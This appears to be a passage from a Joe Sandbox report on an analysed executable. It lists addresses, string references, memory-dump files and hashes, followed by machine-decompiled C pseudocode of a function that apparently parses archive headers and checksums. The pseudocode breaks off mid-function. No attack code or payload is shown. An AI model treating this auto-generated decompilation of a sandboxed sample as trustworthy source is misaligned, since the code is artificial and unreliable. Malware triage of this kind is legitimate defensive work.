0x00bcda43
0x00bcda49
0x00bcda49
0x00bcda50
0x00bcda51
0x00bcda52
0x00bcda57
0x00bcda5a
0x00bcda5a
0x00bcda5a
0x00bcd78e
0x00bcda5c
0x00bcda5c
0x00bcda5e
0x00bcdacc
0x00bcdad3
0x00bcdad3
0x00bcdad3
0x00bcdada
0x00bcdadc
0x00bcdae2
0x00bcdae3
0x00bcdf8f
0x00bcdf8f
0x00bcdf90
0x00bcdf91
0x00bcdf96
0x00000000
0x00000000
0x00000000
0x00000000
0x00bcda60
0x00bcda66
0x00bcda66
0x00bcda6c
0x00bcda6c
0x00bcda78
0x00000000
0x00bcda78
0x00bcd707
0x00bcdf99
0x00bcdf99
0x00bcdf9f
0x00bcdfa1
0x00bcdfa7
0x00bcdfad
0x00bcdfaf
0x00bcdfb1
0x00bcdfb3
0x00bcdfb3
0x00bcdfb5
0x00bcdfb5
0x00bcdfbe
0x00bcdfbf
0x00bcdfc3
0x00bcdfca
0x00bcdfcd
0x00bcdfce
0x00bcdfd0
0x00bcdfd0
0x00bcdfd4
0x00bcdfda
0x00bcdfdc
0x00bcdfe2
0x00bcdfe4
0x00bcdfea
0x00bcdfed
0x00bce000
0x00bce003
0x00bce009
0x00bce01e
0x00bce023
0x00bcdfef
0x00bcdff1
0x00bcdff8
0x00bcdff8
0x00bcdfed
0x00bce026
0x00bce026
0x00bce036
0x00bce03f
0x00bce040
0x00bce042
0x00bce0d9
0x00bce0db
0x00bce0e6
0x00bce0e6
0x00bce0e8
0x00bce0eb
0x00bce0ed
0x00000000
0x00bce0dd
0x00bce0e3
0x00bce0e3
0x00bce048
0x00bce048
0x00bce04e
0x00bce051
0x00bce057
0x00bce05a
0x00bce060
0x00bce062
0x00bce068
0x00bce06a
0x00bce06c
0x00bce06c
0x00bce06e
0x00bce06e
0x00bce07b
0x00bce082
0x00bce085
0x00bce086
0x00bce088
0x00bce089
0x00bce089
0x00bce08d
0x00bce093
0x00bce095
0x00bce097
0x00bce09d
0x00bce0a0
0x00bce0b4
0x00bce0ba
0x00bce0cf
0x00bce0d4
0x00bce0a2
0x00bce0a2
0x00bce0a9
0x00bce0a9
0x00bce0a0
0x00bce095
0x00bce0f3
0x00bce0f3
0x00bce0f3
0x00bce0ff
0x00bce102
0x00bce108
0x00bce10a
0x00bce10c
0x00bce112
0x00bce114
0x00bce114
0x00bce114
0x00bce112
0x00bce119
0x00bce11a
0x00bce11c
0x00bce11e
0x00bce11e
0x00bce120
0x00bce126
0x00bce12c
0x00bce12e
0x00bce134
0x00bce134
0x00bce13a
0x00bce13c
0x00000000
0x00000000
0x00bce142
0x00bce144
0x00bce146
0x00bce146
0x00bce148
0x00bce148
0x00bce158
0x00bce15f
0x00bce162
0x00bce163
0x00bce165
0x00bce165
0x00bce169
0x00bce16f
0x00bce171
0x00bce173
0x00bce179
0x00bce17c
0x00bce18d
0x00bce190
0x00bce196
0x00bce1ab
0x00bce1b0
0x00bce17e
0x00bce17e
0x00bce185
0x00bce185
0x00bce17c
0x00bce1c1
0x00bce1d0
0x00bce1d1
0x00bce1d1
0x00bce1d3
0x00bce1d5
0x00bce1d5
0x00bce1db
0x00bce1de
0x00bce1e0
0x00bce1e2
0x00bce1e2
0x00bce1e5
0x00bce1e6
0x00bce1e6
0x00bce1eb
0x00bce1ee
0x00bce1f2
0x00bce1f2
0x00bce1f3
0x00bce1f5
0x00bce1fb
0x00bce201
0x00000000
0x00000000
0x00000000
0x00bce201
0x00bce134
0x00bce207
0x00bce207
0x00000000
0x00bce207
0x00bccf8c
0x00bccf83
0x00bccf7a
0x00bccf31
0x00bccf35
0x00bccf3d
0x00000000
0x00bccf3f
0x00bccf45
0x00bccf4a
0x00bce226
0x00bce226
0x00bce229
0x00bce234
0x00bce25f
0x00bce260
0x00bce261
0x00bce262
0x00bce263
0x00bce264
0x00bce269
0x00bce271
0x00bce276
0x00bce27c
0x00bce281
0x00bce282
0x00bce282
0x00bce282
0x00bce288
0x00bce289
0x00bce289
0x00bce28c
0x00bce292
0x00000000
0x00000000
0x00bce294
0x00bce299
0x00bce29c
0x00bce29e
0x00bce2a6
0x00bce2a8
0x00bce2aa
0x00bce2af
0x00bce2b2
0x00bce2b8
0x00bce2bb
0x00bce2bd
0x00bce2bd
0x00bce2bd
0x00bce2bd
0x00bce2bb
0x00bce2c0
0x00bce2cc
0x00bce2d2
0x00bce2da
0x00bce2df
0x00bce2e0
0x00bce2e5
0x00bce2e5
0x00bce2e5
0x00bce2e5
0x00bce2e9
0x00bce2e9
0x00bce2ec
0x00bce2f3
0x00bce300
0x00bce236
0x00bce236
0x00bce236
0x00bce240
0x00bce249
0x00bce24e
0x00bce25c
0x00bce25c
0x00bce234
0x00bccf3d

APIs

__floor_pentium4.LIBCMT ref: 00BCD014

Strings

1#SNAN, xrefs: 00BCE213
1#INF, xrefs: 00BCE221
1#QNAN, xrefs: 00BCE21A
1#IND, xrefs: 00BCE20C

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: fc32f538cfc60c922e96c522f94d135573f2c8f76e6089b2129cec9b0bc85056
Instruction ID: efb19a01e5f92c7cbbbf98586c12c637dd914a1fd9e68a499921701a0e75bd79
Opcode Fuzzy Hash: fc32f538cfc60c922e96c522f94d135573f2c8f76e6089b2129cec9b0bc85056
Instruction Fuzzy Hash: 0EC21775E086298FDB25CE289D80BEAB7F5EB84305F1541EED85DE7240E774AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 00BA27D4 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00BA27D4(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t334;
				signed int _t338;
				char _t357;
				signed short _t364;
				signed int _t369;
				signed int _t376;
				signed char _t379;
				signed char _t382;
				char _t399;
				signed int _t400;
				signed int _t404;
				signed char _t418;
				intOrPtr _t419;
				char _t420;
				signed int _t423;
				signed int _t424;
				signed char _t429;
				signed int _t432;
				signed int _t436;
				signed short _t441;
				signed short _t446;
				unsigned int _t451;
				signed int _t454;
				void* _t457;
				signed int _t459;
				signed int _t462;
				void* _t469;
				signed int _t475;
				unsigned int _t480;
				void* _t481;
				void* _t488;
				void* _t489;
				signed char _t495;
				signed int _t509;
				intOrPtr* _t523;
				signed int _t526;
				signed int _t527;
				intOrPtr* _t528;
				signed int _t536;
				signed int _t541;
				signed int _t543;
				unsigned int _t552;
				signed int _t554;
				signed int _t567;
				signed char _t569;
				signed int _t570;
				void* _t593;
				signed int _t597;
				signed int _t609;
				signed int _t611;
				signed int _t613;
				unsigned int _t620;
				signed char _t636;
				signed char _t647;
				signed int _t650;
				unsigned int _t651;
				signed int _t654;
				signed int _t655;
				signed int _t657;
				signed int _t658;
				unsigned int _t660;
				signed int _t664;
				void* _t665;
				void* _t672;
				signed int _t675;
				signed int _t676;
				signed char _t677;
				signed int _t680;
				void* _t682;
				signed int _t688;
				signed int _t689;
				void* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t705;
				signed int _t706;
				intOrPtr _t709;
				void* _t710;
				signed char _t719;

				_t528 = __ecx;
				E00BBE0E4(E00BD1B2F, _t710);
				E00BBE1C0();
				_t523 = _t528;
				 *((intOrPtr*)(_t710 + 0x20)) = _t523;
				E00BAC4A5(_t710 + 0x24, _t523);
				 *((intOrPtr*)(_t710 + 0x1c)) = 0;
				 *((intOrPtr*)(_t710 - 4)) = 0;
				_t664 = 7;
				if( *(_t523 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t710 + 0x5f)) = 0;
					L7:
					_push(_t664);
					E00BAC6B0();
					if( *((intOrPtr*)(_t710 + 0x3c)) != 0) {
						 *(_t523 + 0x21e4) = E00BAC4EB(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21f4) = 0;
						_t688 = E00BAC4D3(_t710 + 0x24) & 0x000000ff;
						_t334 = E00BAC4EB(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21ec) = _t334;
						 *(_t523 + 0x21f4) = _t334 >> 0x0000000e & 0x00000001;
						_t536 = E00BAC4EB(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21f0) = _t536;
						 *(_t523 + 0x21e8) = _t688;
						__eflags = _t536 - _t664;
						if(_t536 >= _t664) {
							_t689 = _t688 - 0x73;
							__eflags = _t689;
							if(_t689 == 0) {
								 *(_t523 + 0x21e8) = 1;
							} else {
								_t705 = _t689 - 1;
								__eflags = _t705;
								if(_t705 == 0) {
									 *(_t523 + 0x21e8) = 2;
								} else {
									_t706 = _t705 - 6;
									__eflags = _t706;
									if(_t706 == 0) {
										 *(_t523 + 0x21e8) = 3;
									} else {
										__eflags = _t706 == 1;
										if(_t706 == 1) {
											 *(_t523 + 0x21e8) = 5;
										}
									}
								}
							}
							_t338 =  *(_t523 + 0x21e8);
							 *(_t523 + 0x21dc) = _t338;
							__eflags = _t338 - 0x75;
							if(_t338 != 0x75) {
								__eflags = _t338 - 1;
								if(_t338 != 1) {
									L23:
									_push(_t536 - 7);
									L24:
									E00BAC6B0();
									 *((intOrPtr*)(_t523 + 0x6ca8)) =  *((intOrPtr*)(_t523 + 0x6ca0)) + E00BA1954(_t523,  *(_t523 + 0x21f0));
									_t541 =  *(_t523 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t523 + 0x6cac) =  *(_t523 + 0x6ca4);
									 *(_t710 + 0x50) = _t541;
									__eflags = _t541 - 1;
									if(__eflags == 0) {
										_t665 = _t523 + 0x2208;
										E00BAAC0C(_t665);
										_t543 = 5;
										memcpy(_t665, _t523 + 0x21e4, _t543 << 2);
										 *(_t523 + 0x221c) = E00BAC4EB(_t710 + 0x24);
										_t647 = E00BAC520(_t710 + 0x24);
										 *(_t523 + 0x2220) = _t647;
										 *(_t523 + 0x6cb5) =  *(_t523 + 0x2210) & 0x00000001;
										 *(_t523 + 0x6cb4) =  *(_t523 + 0x2210) >> 0x00000003 & 0x00000001;
										_t552 =  *(_t523 + 0x2210);
										 *(_t523 + 0x6cb7) = _t552 >> 0x00000002 & 0x00000001;
										 *(_t523 + 0x6cbb) = _t552 >> 0x00000006 & 0x00000001;
										 *(_t523 + 0x6cbc) = _t552 >> 0x00000007 & 0x00000001;
										__eflags = _t647;
										if(_t647 != 0) {
											L119:
											_t357 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t523 + 0x6cb8)) = _t357;
											 *(_t523 + 0x2224) = _t552 >> 0x00000001 & 0x00000001;
											_t554 = _t552 >> 0x00000004 & 0x00000001;
											__eflags = _t554;
											 *(_t523 + 0x6cb9) = _t552 >> 0x00000008 & 0x00000001;
											 *(_t523 + 0x6cba) = _t554;
											L121:
											_t664 = 7;
											L122:
											_t364 = E00BAC5D1(_t710 + 0x24, 0);
											__eflags =  *(_t523 + 0x21e4) - (_t364 & 0x0000ffff);
											if( *(_t523 + 0x21e4) == (_t364 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t710 + 0x1c)) =  *((intOrPtr*)(_t710 + 0x3c));
												goto L133;
											}
											_t369 =  *(_t523 + 0x21e8);
											__eflags = _t369 - 0x79;
											if(_t369 == 0x79) {
												goto L132;
											}
											__eflags = _t369 - 0x76;
											if(_t369 == 0x76) {
												goto L132;
											}
											__eflags = _t369 - 5;
											if(_t369 != 5) {
												L130:
												 *((char*)(_t523 + 0x6cc4)) = 1;
												E00BA6F5B(0xbdff50, 3);
												__eflags =  *((char*)(_t710 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E00BA7032(__eflags, 4, _t523 + 0x1e, _t523 + 0x1e);
												 *((char*)(_t523 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t523 + 0x45ae);
											if( *(_t523 + 0x45ae) == 0) {
												goto L130;
											}
											 *0xbd2260();
											_t376 =  *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0x14))))() - _t664;
											__eflags = _t376;
											asm("sbb edx, ecx");
											 *0xbd2260(_t376, _t647, 0);
											 *((intOrPtr*)( *_t523 + 0x10))();
											 *(_t710 + 0x5e) = 1;
											do {
												_t379 = E00BA98FD(_t523);
												asm("sbb al, al");
												_t382 =  !( ~_t379) &  *(_t710 + 0x5e);
												 *(_t710 + 0x5e) = _t382;
												_t664 = _t664 - 1;
												__eflags = _t664;
											} while (_t664 != 0);
											__eflags = _t382;
											if(_t382 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t357 = 0;
										__eflags =  *(_t523 + 0x221c);
										if( *(_t523 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t523 + 0x21ec) & 0x00008000;
										if(( *(_t523 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t523 + 0x6ca8)) =  *((intOrPtr*)(_t523 + 0x6ca8)) + E00BAC520(_t710 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t541 - 3;
									if(_t541 <= 3) {
										__eflags = _t541 - 2;
										_t64 = (0 | _t541 != 0x00000002) - 1; // -1
										_t672 = (_t64 & 0xffffdcb0) + 0x45d0 + _t523;
										 *(_t710 + 0x48) = _t672;
										E00BAAB72(_t672, 0);
										_t567 = 5;
										memcpy(_t672, _t523 + 0x21e4, _t567 << 2);
										_t695 =  *(_t710 + 0x48);
										_t675 =  *(_t710 + 0x50);
										_t569 =  *(_t695 + 8);
										 *(_t695 + 0x1098) =  *(_t695 + 8) & 1;
										 *(_t695 + 0x1099) = _t569 >> 0x00000001 & 1;
										 *(_t695 + 0x109b) = _t569 >> 0x00000002 & 1;
										 *(_t695 + 0x10a0) = _t569 >> 0x0000000a & 1;
										__eflags = _t675 - 2;
										if(_t675 != 2) {
											L35:
											_t650 = 0;
											__eflags = 0;
											_t399 = 0;
											L36:
											 *((char*)(_t695 + 0x10f0)) = _t399;
											__eflags = _t675 - 2;
											if(_t675 == 2) {
												L39:
												_t400 = _t650;
												L40:
												 *(_t695 + 0x10fa) = _t400;
												_t570 = _t569 & 0x000000e0;
												__eflags = _t570 - 0xe0;
												 *((char*)(_t695 + 0x10f1)) = 0 | _t570 == 0x000000e0;
												__eflags = _t570 - 0xe0;
												if(_t570 != 0xe0) {
													_t651 =  *(_t695 + 8);
													_t404 = 0x10000 << (_t651 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t404 = _t650;
													_t651 =  *(_t695 + 8);
												}
												 *(_t695 + 0x10f4) = _t404;
												 *(_t695 + 0x10f3) = _t651 >> 0x0000000b & 0x00000001;
												 *(_t695 + 0x10f2) = _t651 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t695 + 0x14)) = E00BAC520(_t710 + 0x24);
												 *(_t710 + 0x54) = E00BAC520(_t710 + 0x24);
												 *((char*)(_t695 + 0x18)) = E00BAC4D3(_t710 + 0x24);
												 *(_t695 + 0x1070) = 2;
												 *((intOrPtr*)(_t695 + 0x1074)) = E00BAC520(_t710 + 0x24);
												 *(_t710 + 0x18) = E00BAC520(_t710 + 0x24);
												 *(_t695 + 0x1c) = E00BAC4D3(_t710 + 0x24) & 0x000000ff;
												 *((char*)(_t695 + 0x20)) = E00BAC4D3(_t710 + 0x24) - 0x30;
												 *(_t710 + 0x4c) = E00BAC4EB(_t710 + 0x24) & 0x0000ffff;
												_t418 = E00BAC520(_t710 + 0x24);
												_t654 =  *(_t695 + 0x1c);
												 *(_t710 + 0x58) = _t418;
												 *(_t695 + 0x24) = _t418;
												__eflags = _t654 - 0x14;
												if(_t654 < 0x14) {
													__eflags = _t418 & 0x00000010;
													if((_t418 & 0x00000010) != 0) {
														 *((char*)(_t695 + 0x10f1)) = 1;
													}
												}
												 *(_t695 + 0x109c) = 0;
												__eflags =  *(_t695 + 0x109b);
												if( *(_t695 + 0x109b) == 0) {
													L55:
													_t419 =  *((intOrPtr*)(_t695 + 0x18));
													 *(_t695 + 0x10fc) = 2;
													__eflags = _t419 - 3;
													if(_t419 == 3) {
														L59:
														 *(_t695 + 0x10fc) = 1;
														L60:
														 *(_t695 + 0x1100) = 0;
														__eflags = _t419 - 3;
														if(_t419 == 3) {
															__eflags = ( *(_t710 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t710 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t695 + 0x1100) = 1;
																 *((short*)(_t695 + 0x1104)) = 0;
															}
														}
														__eflags = _t675 - 2;
														if(_t675 == 2) {
															L66:
															_t420 = 0;
															goto L67;
														} else {
															__eflags =  *(_t695 + 0x24);
															if( *(_t695 + 0x24) >= 0) {
																goto L66;
															}
															_t420 = 1;
															L67:
															 *((char*)(_t695 + 0x10f8)) = _t420;
															_t423 =  *(_t695 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t423;
															 *(_t695 + 0x10f9) = _t423;
															if(_t423 == 0) {
																__eflags =  *(_t710 + 0x54) - 0xffffffff;
																_t647 = 0;
																_t676 = 0;
																_t137 =  *(_t710 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t424 = _t423 & 0xffffff00 | _t137;
																L73:
																 *(_t695 + 0x109a) = _t424;
																 *((intOrPtr*)(_t695 + 0x1058)) = 0 +  *((intOrPtr*)(_t695 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t695 + 0x105c)) = _t676;
																asm("adc edx, ecx");
																 *(_t695 + 0x1060) = 0 +  *(_t710 + 0x54);
																__eflags =  *(_t695 + 0x109a);
																 *(_t695 + 0x1064) = _t647;
																if( *(_t695 + 0x109a) != 0) {
																	 *(_t695 + 0x1060) = 0x7fffffff;
																	 *(_t695 + 0x1064) = 0x7fffffff;
																}
																_t429 =  *(_t710 + 0x4c);
																_t677 = 0x1fff;
																 *(_t710 + 0x54) = 0x1fff;
																__eflags = _t429 - 0x1fff;
																if(_t429 < 0x1fff) {
																	_t677 = _t429;
																	 *(_t710 + 0x54) = _t429;
																}
																E00BAC582(_t710 + 0x24, _t710 - 0x2030, _t677);
																_t432 = 0;
																__eflags =  *(_t710 + 0x50) - 2;
																 *((char*)(_t710 + _t677 - 0x2030)) = 0;
																if( *(_t710 + 0x50) != 2) {
																	 *(_t710 + 0x50) = _t695 + 0x28;
																	_t435 = E00BB12D6(_t710 - 0x2030, _t695 + 0x28, 0x800);
																	_t680 =  *((intOrPtr*)(_t695 + 0xc)) -  *(_t710 + 0x4c) - 0x20;
																	__eflags =  *(_t695 + 8) & 0x00000400;
																	if(( *(_t695 + 8) & 0x00000400) != 0) {
																		_t680 = _t680 - 8;
																		__eflags = _t680;
																	}
																	__eflags = _t680;
																	if(_t680 <= 0) {
																		_t681 = _t695 + 0x28;
																	} else {
																		 *(_t710 + 0x58) = _t695 + 0x1028;
																		E00BA2020(_t695 + 0x1028, _t680);
																		_t469 = E00BAC582(_t710 + 0x24,  *(_t695 + 0x1028), _t680);
																		_t681 = _t695 + 0x28;
																		_t435 = E00BC3429(_t469, _t695 + 0x28, L"RR");
																		__eflags = _t435;
																		if(_t435 == 0) {
																			__eflags =  *((intOrPtr*)(_t695 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t695 + 0x102c)) >= 0x14) {
																				_t682 =  *( *(_t710 + 0x58));
																				asm("cdq");
																				_t609 =  *(_t682 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t611 = (_t609 << 8) + ( *(_t682 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t613 = (_t611 << 8) + ( *(_t682 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t475 = (_t613 << 8) + ( *(_t682 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t523 + 0x21c0) = _t475 << 9;
																				 *(_t523 + 0x21c4) = ((((_t647 << 0x00000020 | _t609) << 0x8 << 0x00000020 | _t611) << 0x8 << 0x00000020 | _t613) << 0x8 << 0x00000020 | _t475) << 9;
																				 *0xbd2260();
																				_t480 = E00BAFA2C( *(_t523 + 0x21c0),  *(_t523 + 0x21c4),  *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0x14))))(), _t647);
																				 *(_t523 + 0x21c8) = _t480;
																				 *(_t710 + 0x58) = _t480;
																				_t481 = E00BBE110(_t479, _t647, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t435 = E00BAFA2C(_t481 +  *(_t523 + 0x21c0), _t647, _t479, _t647);
																				_t620 =  *(_t710 + 0x58);
																				_t695 =  *(_t710 + 0x48);
																				_t681 =  *(_t710 + 0x50);
																				__eflags = _t435 - _t620;
																				if(_t435 > _t620) {
																					_t435 = _t620 + 1;
																					 *(_t523 + 0x21c8) = _t620 + 1;
																				}
																			}
																		}
																	}
																	_t436 = E00BC3429(_t435, _t681, L"CMT");
																	__eflags = _t436;
																	if(_t436 == 0) {
																		 *((char*)(_t523 + 0x6cb6)) = 1;
																	}
																} else {
																	_t681 = _t695 + 0x28;
																	 *_t681 = 0;
																	__eflags =  *(_t695 + 8) & 0x00000200;
																	if(( *(_t695 + 8) & 0x00000200) != 0) {
																		E00BA6B7C(_t710);
																		_t488 = E00BC3470(_t710 - 0x2030);
																		_t647 =  *(_t710 + 0x54);
																		_t489 = _t488 + 1;
																		__eflags = _t647 - _t489;
																		if(_t647 > _t489) {
																			__eflags = _t489 + _t710 - 0x2030;
																			E00BA6B8D(_t710, _t710 - 0x2030, _t647, _t489 + _t710 - 0x2030, _t647 - _t489, _t681, 0x800);
																		}
																		_t432 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t681 - _t432;
																	if( *_t681 == _t432) {
																		_push(1);
																		_push(0x800);
																		_push(_t681);
																		_push(_t710 - 0x2030);
																		E00BAFA82();
																	}
																	E00BA207F(_t523, _t695);
																}
																__eflags =  *(_t695 + 8) & 0x00000400;
																if(( *(_t695 + 8) & 0x00000400) != 0) {
																	E00BAC582(_t710 + 0x24, _t695 + 0x10a1, 8);
																}
																E00BB0BC0( *(_t710 + 0x18));
																__eflags =  *(_t695 + 8) & 0x00001000;
																if(( *(_t695 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t523 + 0x6ca8)) = E00BA3E3C( *((intOrPtr*)(_t523 + 0x6ca8)),  *(_t523 + 0x6cac),  *((intOrPtr*)(_t695 + 0x1058)),  *((intOrPtr*)(_t695 + 0x105c)), 0, 0);
																	 *(_t523 + 0x6cac) = _t647;
																	 *((char*)(_t710 + 0x20)) =  *(_t695 + 0x10f2);
																	_t441 = E00BAC5D1(_t710 + 0x24,  *((intOrPtr*)(_t710 + 0x20)));
																	__eflags =  *_t695 - (_t441 & 0x0000ffff);
																	if( *_t695 != (_t441 & 0x0000ffff)) {
																		 *((char*)(_t523 + 0x6cc4)) = 1;
																		E00BA6F5B(0xbdff50, 1);
																		__eflags =  *((char*)(_t710 + 0x5f));
																		if(__eflags == 0) {
																			E00BA7032(__eflags, 0x1c, _t523 + 0x1e, _t681);
																		}
																	}
																	goto L121;
																} else {
																	_t446 = E00BAC4EB(_t710 + 0x24);
																	 *((intOrPtr*)(_t710 + 4)) = _t523 + 0x32c0;
																	 *((intOrPtr*)(_t710 + 8)) = _t523 + 0x32c8;
																	 *((intOrPtr*)(_t710 + 0xc)) = _t523 + 0x32d0;
																	__eflags = 0;
																	_t696 = 0;
																	 *((intOrPtr*)(_t710 + 0x10)) = 0;
																	_t451 = _t446 & 0x0000ffff;
																	 *(_t710 + 0x4c) = 0;
																	 *(_t710 + 0x58) = _t451;
																	do {
																		_t593 = 3;
																		_t526 = _t451 >> _t593 - _t696 << 2;
																		__eflags = _t526 & 0x00000008;
																		if((_t526 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t710 + 4 + _t696 * 4);
																		if( *(_t710 + 4 + _t696 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t696;
																		if(__eflags != 0) {
																			E00BB0BC0(E00BAC520(_t710 + 0x24));
																		}
																		E00BB09EA( *(_t710 + 4 + _t696 * 4), _t647, __eflags, _t710 - 0x30);
																		__eflags = _t526 & 0x00000004;
																		if((_t526 & 0x00000004) != 0) {
																			_t249 = _t710 - 0x1c;
																			 *_t249 =  *(_t710 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t597 = 0;
																		 *(_t710 - 0x18) = 0;
																		_t527 = _t526 & 0x00000003;
																		__eflags = _t527;
																		if(_t527 <= 0) {
																			L109:
																			_t454 = _t597 * 0x64;
																			__eflags = _t454;
																			 *(_t710 - 0x18) = _t454;
																			E00BB0C1E( *(_t710 + 4 + _t696 * 4), _t647, _t710 - 0x30);
																			_t451 =  *(_t710 + 0x58);
																		} else {
																			_t457 = 3;
																			_t459 = _t457 - _t527 << 3;
																			__eflags = _t459;
																			 *(_t710 + 0x18) = _t459;
																			_t697 = _t459;
																			do {
																				_t462 = (E00BAC4D3(_t710 + 0x24) & 0x000000ff) << _t697;
																				_t697 = _t697 + 8;
																				_t597 =  *(_t710 - 0x18) | _t462;
																				 *(_t710 - 0x18) = _t597;
																				_t527 = _t527 - 1;
																				__eflags = _t527;
																			} while (_t527 != 0);
																			_t696 =  *(_t710 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t696 = _t696 + 1;
																		 *(_t710 + 0x4c) = _t696;
																		__eflags = _t696 - 4;
																	} while (_t696 < 4);
																	_t523 =  *((intOrPtr*)(_t710 + 0x20));
																	_t695 =  *(_t710 + 0x48);
																	goto L112;
																}
															}
															_t676 = E00BAC520(_t710 + 0x24);
															_t495 = E00BAC520(_t710 + 0x24);
															__eflags =  *(_t710 + 0x54) - 0xffffffff;
															_t647 = _t495;
															if( *(_t710 + 0x54) != 0xffffffff) {
																L71:
																_t424 = 0;
																goto L73;
															}
															__eflags = _t647 - 0xffffffff;
															if(_t647 != 0xffffffff) {
																goto L71;
															}
															_t424 = 1;
															goto L73;
														}
													}
													__eflags = _t419 - 5;
													if(_t419 == 5) {
														goto L59;
													}
													__eflags = _t419 - 6;
													if(_t419 < 6) {
														 *(_t695 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t655 = _t654 - 0xd;
													__eflags = _t655;
													if(_t655 == 0) {
														 *(_t695 + 0x109c) = 1;
														goto L55;
													}
													_t657 = _t655;
													__eflags = _t657;
													if(_t657 == 0) {
														 *(_t695 + 0x109c) = 2;
														goto L55;
													}
													_t658 = _t657 - 5;
													__eflags = _t658;
													if(_t658 == 0) {
														L52:
														 *(_t695 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t658 == 6;
													if(_t658 == 6) {
														goto L52;
													}
													 *(_t695 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t569 & 0x00000010;
											if((_t569 & 0x00000010) == 0) {
												goto L39;
											}
											_t400 = 1;
											goto L40;
										}
										__eflags = _t569 & 0x00000010;
										if((_t569 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t399 = 1;
											_t650 = 0;
											goto L36;
										}
									}
									__eflags = _t541 - 5;
									if(_t541 != 5) {
										goto L115;
									} else {
										memcpy(_t523 + 0x4590, _t523 + 0x21e4, _t541 << 2);
										_t660 =  *(_t523 + 0x4598);
										 *(_t523 + 0x45ac) =  *(_t523 + 0x4598) & 0x00000001;
										_t636 = _t660 >> 0x00000001 & 0x00000001;
										_t647 = _t660 >> 0x00000003 & 0x00000001;
										 *(_t523 + 0x45ad) = _t636;
										 *(_t523 + 0x45ae) = _t660 >> 0x00000002 & 0x00000001;
										 *(_t523 + 0x45af) = _t647;
										__eflags = _t636;
										if(_t636 != 0) {
											 *((intOrPtr*)(_t523 + 0x45a4)) = E00BAC520(_t710 + 0x24);
										}
										__eflags =  *(_t523 + 0x45af);
										if( *(_t523 + 0x45af) != 0) {
											_t509 = E00BAC4EB(_t710 + 0x24) & 0x0000ffff;
											 *(_t523 + 0x45a8) = _t509;
											 *(_t523 + 0x6cd8) = _t509;
										}
										goto L121;
									}
								}
								__eflags =  *(_t523 + 0x21ec) & 0x00000002;
								if(( *(_t523 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00BA203A(_t523);
							L133:
							E00BA15D1(_t710 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t710 - 0xc));
							return  *((intOrPtr*)(_t710 + 0x1c));
						}
					}
					L8:
					E00BA3F40(_t523, _t647);
					goto L133;
				}
				_t647 =  *((intOrPtr*)(_t523 + 0x6cc0)) + _t664;
				asm("adc eax, ecx");
				_t719 =  *(_t523 + 0x6ca4);
